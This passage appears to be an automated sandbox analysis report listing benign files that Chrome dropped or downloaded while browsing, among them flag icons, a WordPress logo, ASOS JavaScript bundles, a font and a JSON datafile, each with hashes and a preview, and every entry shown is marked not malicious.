                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...P...P............sRGB.........IDATx..].tT.......2!;.......U+..bm......ZA..B.[.."...R.....R==...'.S[.EK8.e5..I.@....:....af2.Kf.v.?gr.w..........P...nO<.0~.Ec..".c.Z......2..U..b....I..*.vM~.$.#.Qs.F..vD.....,...4.L.....jll....e.......O..###OGGG....=d4..2.-.+(.U)i.kh......Emm.\Y.c.t..J.~...Fh$2.....k...!.rm.]...............]...hB$Ij....6k.[t.w..Fs..)...#pTV.......+.m...}.P;**....D\Sh...tj..L.t.....k6].|....E~7.t'..m!..@R.t>.-..|$.=..F..%d5.&YN..r.xt.%$$....T9.t..ug/&W}....jjjh.........2..7..a;...6o.....=@..g.|y. O...c...4l....+9...,.)..x....A.........Tj..E..."7(...T.^.BP..,./%m..ck%...Hk..5.4bi6...Qnf.........?;..*O..:.;l".....%..+^$t.n....JO.t.R.N..L..fd...}....f..J.t(..b!O.^.....+t....,]...8!3..+?%[.2Q..u.L...jtc2.g].3...... .'pT.p2U|A6.t.....Z..{4.Z.t..`.&`.t..1k.P[y.w.............^...]`.H....;!....i....kH.s3....M6...I3.`.6`.DMTG ..s...S.4....9.1*.B"...................ML..9....90....... /p.>.... ........l|Wta.{..t.M..?.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2893
                                                                                                                                                                                                                                                                  Entropy (8bit):7.912925986158937
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:03cQdRHChzFYMl4FTpjPKEKTjdaLcI5G/60saAdikLRfJzVVwwYyaKxMdNzxzSFL:fQ+hz+Ml4TlKndatStHA8qBhVww3Md5s
                                                                                                                                                                                                                                                                  MD5:C9D346C188F3406F1EDE034E90D5B5C1
                                                                                                                                                                                                                                                                  SHA1:2EFC812A53CC7D79C9D64E309C4673D0067C07D1
                                                                                                                                                                                                                                                                  SHA-256:C89F0F5DCDE39CA9E55FEA4859DE4FB69DDEEF96E935A59229899CACBDC633C6
                                                                                                                                                                                                                                                                  SHA-512:43C0B13A21A94D5A8B81AF217B3675AC52D277A036DF03CBFCAB13E8D74EB784537F7A5311F0F71A248B3350E95DD2C3AF88D94191F519105162E28B0028799C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...P...P............sRGB.........IDATx..[l......_../`7.C.L ..T$...DB...).1.J..U.Z...>....V.".@T.T.E&"-Q.RJ($......X.{.......Yv....w....i<3.:..w.w.w.5.<.`0....6..#..w..,.N.q..........h...d...l.v.];.z<...z...,.....wD"...o;.[.~5=..U..u...t:.:::.._.q.WM._.C............^.,..._....1..Z..l.XH.$b..g.U..8.8'.Ib.H$.9.....e.tA..{...}..k.d ..\..]...]....#...`..{o.n...\.....\..... i....%...0MNN.7..,.n..m....Q..L".P......}..[..$C.JZ..........*.H.\:H.......$.2.ax1... .N....:<H]..|...Q..W...<.d6...J...g(.:<n.Y.Z.to.qJQ.2..A....g.}y....4...,t...X......B{...^+..f...BQf.....4.....v.R..9Zw.[d;........TCZ...Gv..ph._.hj.A2.u....9x.._..n2..F.d.+. .{nQ......Z.5@n.,.~..72.9.*....hw..m}........A......e". .O..3.*.T..tqf.p..;[.|9r1...@......$.g..t.5g~...r..iD...O...o.K..)..7~.w.S.#...y.d...).n6..g.H.J....R6..g...}...n{......e%.^.E.xFk].P..].....hc.qR....k...j2.. $or4|^..F...K...6..q.u1B~...(...9_.$VD.m^p$tV.g.9....]..\.K`.K.....g+m.g..m.` z:Wm....J.9).\..<H
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1237
                                                                                                                                                                                                                                                                  Entropy (8bit):4.529756812811964
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:t4178BtFtOtvxeT09GIvDvrcRnaP8OYEdXKceGS+DX057ABm9mX84p2eT4:CIBtFAtvxx2RZOYEdPeGS6X05km9gvR4
                                                                                                                                                                                                                                                                  MD5:8B80CE17A35BC980EDBCA32704FF6D4B
                                                                                                                                                                                                                                                                  SHA1:A0844CB982A1091BE97A175F6A353FFDDF92A597
                                                                                                                                                                                                                                                                  SHA-256:83431FA4D894678730F7EA8D0FA1CDE613EC26BD059031BFF95530C5D70A1F10
                                                                                                                                                                                                                                                                  SHA-512:9494E260B4C0C0EC3982621E9888ED74ED5FA778181F9FF7A15E69A7DA66E5747F4CD7A803F2EB0DDE8E48EA77FF4632BA3200B2385A43996D91144952FD8C39
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 812 812.02" fill="#101517"><title>wordpressdotcom-mark-black</title><g id="Layer_2" data-name="Layer 2"><g id="Black_W" data-name="Black W"><path d="M406,0C182.13,0,0,182.13,0,406S182.13,812,406,812,812,629.88,812,406,629.86,0,406,0ZM41,406A363.54,363.54,0,0,1,72.59,257.43L246.71,734.51C124.93,675.35,41,550.48,41,406ZM406,771.06a365.51,365.51,0,0,1-103.12-14.87L412.41,437.92,524.6,745.33a34.54,34.54,0,0,0,2.62,5A364.46,364.46,0,0,1,406,771.06Zm50.3-536.22c22-1.15,41.78-3.46,41.78-3.46,19.67-2.33,17.35-31.24-2.32-30.08,0,0-59.13,4.64-97.3,4.64-35.87,0-96.13-4.64-96.13-4.64-19.69-1.16-22,28.91-2.32,30.08,0,0,18.62,2.31,38.29,3.46l56.86,155.82-79.9,239.58L182.35,234.84c22-1.15,41.77-3.46,41.77-3.46,19.67-2.33,17.34-31.24-2.33-30.08,0,0-59.12,4.64-97.28,4.64-6.85,0-14.93-.18-23.51-.45C166.28,106.4,278.47,41,406,41a363.61,363.61,0,0,1,246.49,95.84c-1.56-.11-3.1-.3-4.72-.3-35.86,0-61.3,31.23-61.3,64.79,0,30.08,17.35,55.52,35.86,85.61,13.87
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65450)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):696717
                                                                                                                                                                                                                                                                  Entropy (8bit):5.400373953164625
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12288:92I3au++0oitbe13WmfmFtvJ5/ps0TskQkaIeya:MI3a1+0oV3WmfmFtamdeya
                                                                                                                                                                                                                                                                  MD5:6256A7BE50E6AFA38D5B3BB7C283B9EA
                                                                                                                                                                                                                                                                  SHA1:10E717AE88868FDEC4089EE1805DBD43A3969698
                                                                                                                                                                                                                                                                  SHA-256:B8B511D485140A7C53B27C79DCFA1E757C3945F48D5CBF3A08193295844DBAC0
                                                                                                                                                                                                                                                                  SHA-512:77271ED8D8924E247E071858EE169F08C8172E95081DD21D01E0465108942124BA44CC0C0E4CB4ED1D7645E0DF411385B5B9DA44C38A6C17C58F39BD00B1AD43
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:/*! For license information please see vendors.d80e45b3529c947b8d3f.js.LICENSE.txt */.(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([[216],{93468:(e,t,n)=>{"use strict";var r=n(35582),o=n(72686),i=function(e,t){return i=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},i(e,t)};function a(e,t,n,r){return new(n||(n=Promise))((function(o,i){function a(e){try{c(r.next(e))}catch(e){i(e)}}function s(e){try{c(r.throw(e))}catch(e){i(e)}}function c(e){var t;e.done?o(e.value):(t=e.value,t instanceof n?t:new n((function(e){e(t)}))).then(a,s)}c((r=r.apply(e,t||[])).next())}))}function s(e,t){var n,r,o,i,a={label:0,sent:function(){if(1&o[0])throw o[1];return o[1]},trys:[],ops:[]};return i={next:s(0),throw:s(1),return:s(2)},"function"==typeof Symbol&&(i[Symbol.iterator]=function(){return this}),i;function s(s){return function(c){return function(s){if(n)throw new TypeEr
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):98680
                                                                                                                                                                                                                                                                  Entropy (8bit):5.09512762267046
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:XCzWQQWm6NVRsVlTwh6/IOR4NSmImmXkWEYTVR6V2vz:XC6jQVRsV5wh4IOR4NSmImmXBVR6VY
                                                                                                                                                                                                                                                                  MD5:8F726CBF9AAC2EA7CA48C34DD83AB85D
                                                                                                                                                                                                                                                                  SHA1:5AB508ABBE155C7A3D8DCBC1ED2E4E6C0F55BA00
                                                                                                                                                                                                                                                                  SHA-256:E15D88CBF9705AE765C2BD0966D5EB84CD71660EF77BE16A1E0A3528E564EE25
                                                                                                                                                                                                                                                                  SHA-512:AF70BF11784574DB25C5CAAB3A2EDC1F395F6B68AE309B5381857FC1E77631217F407F8096C1159E2E52651C449E3990E4D74AC9F39287CEA340E3923677A42E
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.asos.com/assets/optimizely/datafiles/ShK2dzd7JQhz8jETx1Fkb.json
                                                                                                                                                                                                                                                                  Preview:{"accountId":"19065870423","projectId":"19065870423","revision":"8835","attributes":[{"id":"19445413143","key":"browseCountry"},{"id":"19471622747","key":"locationCountryCode"},{"id":"19572524180","key":"recognised"},{"id":"19584103928","key":"platform"},{"id":"19679101399","key":"loggedIn"},{"id":"19720880074","key":"geoCountry"},{"id":"19952365849","key":"browseStore"},{"id":"20194331169","key":"affiliateId"},{"id":"20201651533","key":"identityAppClient"},{"id":"20202436670","key":"firstTimeVisitor"},{"id":"20212466535","key":"numberOfVisits"},{"id":"20234946677","key":"existingCustomer"},{"id":"20339120648","key":"cypress"},{"id":"21055600153","key":"identityRequestOrigin"},{"id":"21097923050","key":"appProductListingPage"},{"id":"21133402853","key":"isInStock"},{"id":"21139602000","key":"appSavedLists"},{"id":"21156991878","key":"app"},{"id":"21158820156","key":"visitPageCount"},{"id":"21189160222","key":"notBouncedVisit"},{"id":"21191190134","key":"language"},{"id":"21233360138","
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (655), with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):655
                                                                                                                                                                                                                                                                  Entropy (8bit):5.055936985169239
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:2QH2AlXI0Mh3ZoBe1+s+XEKz4tW3DRRTW3u3XDdI+u/obPqRT86f:2QH/wNZoTZXCyRRa3u3X5duQbPqRJf
                                                                                                                                                                                                                                                                  MD5:5048B7BF6F335C259CAE5D653D50726E
                                                                                                                                                                                                                                                                  SHA1:96F45044F726EEF7C8E7C7F21F6368BF23A2B3F0
                                                                                                                                                                                                                                                                  SHA-256:B6E4492D3B8358A81B80908B1F84E6BD2F64A7A46D48793AF99D27BF29F4C2E8
                                                                                                                                                                                                                                                                  SHA-512:8990F24D3989C392C00A4FC59D78945A401EB3295FC287A2C718323CC83E27B2D403E9E08162B2CEF4F5C944B31D3EEE98560ACBB7BC4DC58B70B72AA83A4311
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:(function(){var e=window.WPGroHo||{};e.my_hash="";e.data={};e.renderers={};e.syncProfileData=function(a,r){if(!e.data[a]){e.data[a]={};var n=document.querySelectorAll("div.grofile-hash-map-"+a+" span");for(var t=0;t<n.length;t++){var o=n[t];e.data[a][o.className]=o.textContent}}e.appendProfileData(e.data[a],a,r)};e.appendProfileData=function(a,r,n){for(var t in a){if(typeof e.renderers[t]==="function"){return e.renderers[t](a[t],r,n,t)}var o=document.getElementById(n);if(o){var d=o.querySelector("h4");if(d){var i=document.createElement("p");i.className="grav-extra "+t;i.innerHTML=a[t];d.insertAdjacentElement("afterend",i)}}}};window.WPGroHo=e})();
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2653
                                                                                                                                                                                                                                                                  Entropy (8bit):7.900682567288321
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:kZ84RnYgjr0w4tOEynSRblVnu1x3cGoCvk5eInf0k1rN77E1Kts2Je5+jA:G842gjTUOEynoblVixsGoCvnI1dNHsK4
                                                                                                                                                                                                                                                                  MD5:89EB6DDFF46C123B5C50319133679DB1
                                                                                                                                                                                                                                                                  SHA1:BD2958D629362A7A7EE2AE53314FB3F1AD6FFE4A
                                                                                                                                                                                                                                                                  SHA-256:D4225FEDA05C04710EC2ACE67EADEDDEB533530B3D43A7D287CE82838D18E224
                                                                                                                                                                                                                                                                  SHA-512:AACB75914C2C7E0FE6FF63CF81F606BC7DE4BCDB26D10E69102F97AE75203A75A85FB17F244ABA831023593067A4497E08AD1D97A1762EDA02595E666CBE091D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...P...P............sRGB.........IDATx..[l........]{}I..8!q...6....A....Q..B...E..U....9/}).....DT)...GjU@T*.Aj..@...:W........K..Y...zwg.B...83;s......9.*l.-..]=..+...-..P*..=..>.c.ucLa1.=.%..$.EM0.Or54......1C.}..[.L....f^..;rub.D2.'1..!`;\.0..'....k..~V..i!...M[.=......T.....,..u...;.1k.g......z4.Y8D.....>p.)F...q..a...:..c.c3....l.9.)..[....?kz.....KQ.. @.?|c......./=q.z...v.e.#a.:.U...Y...0.w..g2..-.:V.9......x\U.p.[.w....~XH:..........j:~>..i.P.r.q0.+..Cc.T*iT.*X....B...f..Di.yj;.j.....^nt.n(.........F.ig........$........R..2.sT*3......}..O....Ok@...vkr~z.O.%x.\.F.u...2.05...v. g.v.P.G....m...G'..Xo.*.'..o.....+.P&......m...+...0.....n.1!.s..."..a..\3...9...._.....s...GX...mX.....f...(....<"..3....Rk.5....k.>..g..R...0....h`[k>nZ<..y........M.d.j.;...<....wl.n...^qgk..J.Ai4(...-..m..*.;...P.....c}GQu...2...^s.G..Z............~...Z...Fl#.jC:.j.... .. .6h..$....aqf...^.I.;..Q..I.&...~.DO..O^<....=..zF..
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15340, version 1.0
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):15340
                                                                                                                                                                                                                                                                  Entropy (8bit):7.983406336508752
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:F2gPJde0V2iGrQyD8b3k/tigCdeNqOUd47SH0tsGm:4gPVV2NQE8b3ldeNWH0Wb
                                                                                                                                                                                                                                                                  MD5:19B7A0ADFDD4F808B53AF7E2CE2AD4E5
                                                                                                                                                                                                                                                                  SHA1:81D5D4C7B5035AD10CCE63CF7100295E0C51FDDA
                                                                                                                                                                                                                                                                  SHA-256:C912A9CE0C3122D4B2B29AD26BFE06B0390D1A5BDAA5D6128692C0BEFD1DFBBD
                                                                                                                                                                                                                                                                  SHA-512:49DA16000687AC81FC4CA9E9112BDCA850BB9F32E0AF2FE751ABC57A8E9C3382451B50998CEB9DE56FC4196F1DC7EF46BBA47933FC47EB4538124870B7630036
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfBBc4.woff2
                                                                                                                                                                                                                                                                  Preview:wOF2......;........d..;..........................d..z..J.`..L.Z..<.....\..`..^...x.6.$..6. ..|. ..8..z%......Q.{..q...FF.kd .8.(..d..).!C...Y.JA...r. ..GH8F......nW...".2&....2<..+C...p...b..SC.......J......z.-..Q..#6&1zUe../\...l.....<.....9s...E~.]B-..B.wY..o......Q..*A.F..1j.......-.`P% .. ,..@1.0..~.....WWW.d.u<c{..^.R.+..w....&.........A......+C....(.N.....0.~..0.J.;.Nu..7....]..m.H.....[h.GL3....?)....c.H...2.3.}y........SXI|..iVN'%E.D.W....r..<`....i....6;E$.....U.$j.@...._.......R2....WS...k.vz.R.'a9!^..*.N....h.._.....c.%."..S.2.16B...o.2}.pmU[.|.LI....2.....OWQLO1-....s..8.(...".|6...6R.. ..M-.zO.}w)..v..mXxX...c..3*#.+.v....F`.Z;.zQ.......r,....Yo.....g.h....+.....O.3Y..)Y.8.!....elX......._.3.}k~u.{ C..H.z..FP........@...d..)T.R...L.H.J.j.@..............$...E......y...3.b...I.h u.+%.HA.\..9..8..X.!....gx...].:..V..C...._..X..!....6..)...GM:E.....O.Z.*}k.;.T.k..D.k.O..D5.r..."......?..T.Q.A...CF...3g.5.Dn<.QPy..G..1.9..Q..0..
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 6 x 5
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):50
                                                                                                                                                                                                                                                                  Entropy (8bit):3.8488255736198
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:CN+ltRPQEsJen2sSX:xvQEsJ42sSX
                                                                                                                                                                                                                                                                  MD5:E4D673A55C5656F19EF81563FB10884C
                                                                                                                                                                                                                                                                  SHA1:1F2D8ED221D39329251AD3A6FF1EDB20B7219443
                                                                                                                                                                                                                                                                  SHA-256:F3A8992ACB9AB911E0FA4AE12F4B85EF8E61008619F13EE51C7A121FF87F63B1
                                                                                                                                                                                                                                                                  SHA-512:E0B03411282A979CF772F700D9E5634B0C25C612E380AD33C0D59059B1B479D027016D5BEB148403EF185430DB35F5FAED362F36CE2C8ECAD0E6D8E30CEA97B4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:GIF89a.............!.......,............bx..j....;
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2720
                                                                                                                                                                                                                                                                  Entropy (8bit):7.884700522511444
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:cQxqHcyIcghgMGaZ+HP3Js3XFGMST8BQL9ZUEdK9RjgJhTStYqEZaukPxN:cQxPyI+aZ+HPKfBei9qTeYqqaV
                                                                                                                                                                                                                                                                  MD5:967AD8D31ECFDA30A1074119C56E0BD5
                                                                                                                                                                                                                                                                  SHA1:E9E24D19C7BC47406BF1F5679E852C2F0E9FE0BF
                                                                                                                                                                                                                                                                  SHA-256:E68FD0833CC79262442BA6D28E16CDF9D5C09BD013A12D5D8AE4B60EFCFBAF05
                                                                                                                                                                                                                                                                  SHA-512:F1F8DD292A8D830D0FC3FDA80DA5E78065747AFC7BBE8025D97FEDCE2C858E2009C5646447F4EAE0233D9A92C11659AA90FE4E434D5FD727253722BA0AF3D0FF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...P...P............sRGB........ZIDATx...oT....3~...1...K.a..h.Ta.T.(.,.dU)R.M. ..."t..d.E.Q.aQE....Q#..Euc.....l....x...s&c.z.gl...t}..y.>.w~..98f.0$.....S........Z\\|AW.'Oj.4..TII.TYY..peee.WUUU.={..b...d..3..U.Xbjj........g......6.^2.H....ZWWw....[......j|.F.H..<x........k}>.j. .6....r...&.sw.*.I#.}aa....K.l...I...../......~..T..<l.@.U166.....G...].....k....X....Q.m..=2..Tq..w..:.qCC....8.Q..........t].-;L[.*i.I+......B;..&m7.. .9...xQ......899y.......F.e.L.`.MFw..@...5....uU.C....}P[[{.Pm).Tjl.../..o.0..9r.u.B54.r.....K.........Q..)..y.|...w...lii......a;p...k\6.h...........t.....}..}.-o..M.T.......Q.n.....T.3..]6..uo...}Y. m\1.9.pS.......'..mMMMv.....~....o...n.......s.e<.V..P.....a.dtmoow.\+.....s.........@.m.. ..7o.M.l3..c...%..wZZ.:.n.r.........L.......7n\..T.4...q.zvt:...Y..$...]]]..P..j....zx...5...(.2.......g.....0.yt[4/..W..mw.dB6dDVdF.l.......-..6o.t. 0...:2#{P..w..2If..T.....= #."3.. ......... 3.<.N......0....
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (13624)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):13698
                                                                                                                                                                                                                                                                  Entropy (8bit):5.697522364571399
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:4b7/DYQA8tvbSaFcaL+aHw72F1gW0+G3mxhvFKF/X9FiDHhoMEqCDcrIFmtjW8v4:4b7MQA+vbSaFcaL/HwiF1gW0+G3mxhvg
                                                                                                                                                                                                                                                                  MD5:F9E9660E67C43524C5D32FEFB17A1656
                                                                                                                                                                                                                                                                  SHA1:B5188C897C0B0D4EA1321976207664CD6A20FCDC
                                                                                                                                                                                                                                                                  SHA-256:C89CACD0C31BEFF5767916DCFB82E606A53BF9586B2F95F5112EBE0304DADEF0
                                                                                                                                                                                                                                                                  SHA-512:52BF9A0AE230A02DE3B8161F3AA692CA68E54D74B64FB16645CE05EBC19B99D29E88089D30C5267E927305CCA5A1DF524AD7518CCBEC74BFA1A2F77BEA19959D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/sitechromepublisher/client.sitechrome.styles.b9d17db11b52ff8009cc.js
                                                                                                                                                                                                                                                                  Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([[542],{52984:(e,n,o)=>{o.d(n,{Z:()=>t});const t={container:"ojIeyOc",list:"aR_DfXn",listItem:"F28iPnp ZHWKoMf leavesden3"}},7593:(e,n,o)=>{o.d(n,{Z:()=>t});const t={burger:"btUA6FL",icon:"BKBoO9a TYb4J9A c_IO2I_",burger__hidden:"GsizLQo"}},43110:(e,n,o)=>{o.d(n,{Z:()=>t});const t={button:"qQoHatg sY3mB1c london3-button",button__isPrimary:"UNPPQ3g",button__isSecondary:"hgH_Y9G",button__isTertiary:"_5yfajiU",button__isGreen:"mZPCs_0",button__hasInvertedSize:"z1gXcCj",button__isFullWidth:"rN8Tw8V",content:"IoxIrTY",content__isHidden:"lAtN7Wf",content__truncateText:"ISgGBrx"}},33529:(e,n,o)=>{o.d(n,{Z:()=>t});const t={countryFlag:"Oqkee2R"}},89356:(e,n,o)=>{o.d(n,{Z:()=>t});const t={backdrop:"Y7dVLVI"}},6490:(e,n,o)=>{o.d(n,{Z:()=>t});const t={wrapper:"rcApLkp",container:"o1eR0Yj",container__notLoading:"nxpLsV7",container__withError:"hGhvjVU"}},90869:(e,n,o)=>{o.d(n,{Z:()=>t});const t={inheritDisplay:"d7H1qqN",progres
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (26411)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):26470
                                                                                                                                                                                                                                                                  Entropy (8bit):5.16276785278148
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:lyCFxjcg1z7R/Pnz7VE8rhxa1TKVazavCoU:HLz7fITgq
                                                                                                                                                                                                                                                                  MD5:77AC15A3412FAFAE305B89341B230CB9
                                                                                                                                                                                                                                                                  SHA1:B4F5B04037037550E1AE0DFD0934F69D30363477
                                                                                                                                                                                                                                                                  SHA-256:19AF2EEA404A881A23C39E7F5ADCD0EC43B9F84B96BAAA4862F6CB9444333861
                                                                                                                                                                                                                                                                  SHA-512:0636CC6525771F9CCB6904D3C9E568EC7374FDE9BACC4DDA6107D0A944C569E61AE053CB0F75740816333F71CF47290E933636E427810D776E49A7F5A76756D4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/asos-ui/sdk/saved-items-sdk.iife.48b6fe50.js
                                                                                                                                                                                                                                                                  Preview:this.window=this.window||{},this.window.asos=this.window.asos||{},this.window.asos.customer=this.window.asos.customer||{},this.window.asos.customer.savedItemsSdk=function(t,e){"use strict";function r(t){return t&&t.__esModule&&Object.prototype.hasOwnProperty.call(t,"default")?t.default:t}function n(t,e){return t(e={exports:{}},e.exports),e.exports}var o=r(n((function(t){t.exports=function(t,e,r){return e in t?Object.defineProperty(t,e,{value:r,enumerable:!0,configurable:!0,writable:!0}):t[e]=r,t},t.exports.default=t.exports,t.exports.__esModule=!0}))),i="6.0.0",a="".concat("asos",".").concat("customer",".").concat("savedItemsSdk"),c="me/lists/default",u=c+"/items",s=c+"/summary",f="shared/",l={SORT_ORDER_DESCENDING:"dsc",SORT_ORDER_ASCENDING:"asc"},p={SORTBY_DATE:"date",SORTBY_DISCOUNT:"discount",SORTBY_PRICE:"price",SORTBY_BRAND:"brand",SORTBY_STOCK:"stock",SORTBY_RECENTLY_DISCOUNTED:"recentlydiscounted"},d={EXPAND_VARIANTS:"variants"},h=n((function(t){t.exports=function(t){if(Array.i
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):2720
                                                                                                                                                                                                                                                                  Entropy (8bit):7.884700522511444
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:cQxqHcyIcghgMGaZ+HP3Js3XFGMST8BQL9ZUEdK9RjgJhTStYqEZaukPxN:cQxPyI+aZ+HPKfBei9qTeYqqaV
                                                                                                                                                                                                                                                                  MD5:967AD8D31ECFDA30A1074119C56E0BD5
                                                                                                                                                                                                                                                                  SHA1:E9E24D19C7BC47406BF1F5679E852C2F0E9FE0BF
                                                                                                                                                                                                                                                                  SHA-256:E68FD0833CC79262442BA6D28E16CDF9D5C09BD013A12D5D8AE4B60EFCFBAF05
                                                                                                                                                                                                                                                                  SHA-512:F1F8DD292A8D830D0FC3FDA80DA5E78065747AFC7BBE8025D97FEDCE2C858E2009C5646447F4EAE0233D9A92C11659AA90FE4E434D5FD727253722BA0AF3D0FF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/storesa/images/flags/pl.png
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...P...P............sRGB........ZIDATx...oT....3~...1...K.a..h.Ta.T.(.,.dU)R.M. ..."t..d.E.Q.aQE....Q#..Euc.....l....x...s&c.z.gl...t}..y.>.w~..98f.0$.....S........Z\\|AW.'Oj.4..TII.TYY..peee.WUUU.={..b...d..3..U.Xbjj........g......6.^2.H....ZWWw....[......j|.F.H..<x........k}>.j. .6....r...&.sw.*.I#.}aa....K.l...I...../......~..T..<l.@.U166.....G...].....k....X....Q.m..=2..Tq..w..:.qCC....8.Q..........t].-;L[.*i.I+......B;..&m7.. .9...xQ......899y.......F.e.L.`.MFw..@...5....uU.C....}P[[{.Pm).Tjl.../..o.0..9r.u.B54.r.....K.........Q..)..y.|...w...lii......a;p...k\6.h...........t.....}..}.-o..M.T.......Q.n.....T.3..]6..uo...}Y. m\1.9.pS.......'..mMMMv.....~....o...n.......s.e<.V..P.....a.dtmoow.\+.....s.........@.m.. ..7o.M.l3..c...%..wZZ.:.n.r.........L.......7n\..T.4...q.zvt:...Y..$...]]]..P..j....zx...5...(.2.......g.....0.yt[4/..W..mw.dB6dDVdF.l.......-..6o.t. 0...:2#{P..w..2If..T.....= #."3.. ......... 3.<.N......0....
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
